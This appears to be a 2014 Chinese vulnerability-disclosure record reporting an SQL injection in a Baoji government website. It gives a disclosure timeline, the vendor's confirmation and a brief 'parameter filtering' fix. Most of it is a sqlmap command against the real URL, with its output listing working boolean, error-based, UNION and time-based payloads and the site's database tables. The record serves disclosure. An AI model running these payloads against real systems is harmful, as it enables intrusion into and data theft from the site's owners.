2014-10-13: 细节已通知厂商并且等待厂商处理中 2014-10-16: 厂商已经确认,细节仅向厂商公开 2014-10-26: 细节向核心白帽子及相关领域专家公开 2014-11-05: 细节向普通白帽子公开 2014-11-15: 细节向实习白帽子公开 2014-11-27: 细节向公众公开
可注入,可惜没找到后他。我对不起我自己
1注入点:
http://bjgcxx.baoji.gov.cn/list1.php?tid=1658&xm=%E5%B7%A5%E4%BD%9C%E5%8A%A8%E6%80%81&sid=15
2
D:\Python27\sqlmap>sqlmap.py -u "http://bjgcxx.baoji.gov.cn/list1.php?tid=1658&xm=%E5%B7%A5%E4%BD%9C%E5%8A%A8%E6%80%81&sid=15" -p "sid" -D new --tables --batch
Place: GETParameter: sid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: tid=1658&xm=%E5%B7%A5%E4%BD%9C%E5%8A%A8%E6%80%81&sid=15) AND 6854=6854 AND (8600=8600 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: tid=1658&xm=%E5%B7%A5%E4%BD%9C%E5%8A%A8%E6%80%81&sid=15) AND (SELECT 3576 FROM(SELECT COUNT(*),CONCAT(0x7167726271,(SELECT (CASE WHEN (3576=3576) THEN 1 ELSE 0 END)),0x7165776e71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (3402=3402 Type: UNION query Title: MySQL UNION query (NULL) - 15 columns Payload: tid=1658&xm=%E5%B7%A5%E4%BD%9C%E5%8A%A8%E6%80%81&sid=15) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7167726271,0x52644668516355476f78,0x7165776e71),NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: tid=1658&xm=%E5%B7%A5%E4%BD%9C%E5%8A%A8%E6%80%81&sid=15) AND SLEEP(5) AND (4676=4676---web application technology: Nginx, PHP 5.3.14back-end DBMS: MySQL 5.0current database: 'new'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: sid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: tid=1658&xm=%E5%B7%A5%E4%BD%9C%E5%8A%A8%E6%80%81&sid=15) AND 6854=6854 AND (8600=8600 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: tid=1658&xm=%E5%B7%A5%E4%BD%9C%E5%8A%A8%E6%80%81&sid=15) AND (SELECT 3576 FROM(SELECT COUNT(*),CONCAT(0x7167726271,(SELECT (CASE WHEN (3576=3576) THEN 1 ELSE 0 END)),0x7165776e71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (3402=3402 Type: UNION query Title: MySQL UNION query (NULL) - 15 columns Payload: tid=1658&xm=%E5%B7%A5%E4%BD%9C%E5%8A%A8%E6%80%81&sid=15) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7167726271,0x52644668516355476f78,0x7165776e71),NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: tid=1658&xm=%E5%B7%A5%E4%BD%9C%E5%8A%A8%E6%80%81&sid=15) AND SLEEP(5) AND (4676=4676---web application technology: Nginx, PHP 5.3.14back-end DBMS: MySQL 5.0Database: new[26 tables]+--------------+| book_tab || cy_units || cyry_bl || cyry_xinxi || cyunit_bl || daqu || fuwuqi || grlh || lanmu || mysites || news || product_tab || quanxian_tab || type_tab || unit_lh || user1_tab || user_tab || works_tab || xm || xm_cj_unit || xm_list || xmsp_tab || xmxinxi || xmxinxi_view || youxi || zb_xinxi |+--------------+
参数过滤
危害等级:高
漏洞Rank:10
确认时间:2014-10-16 17:06
暂无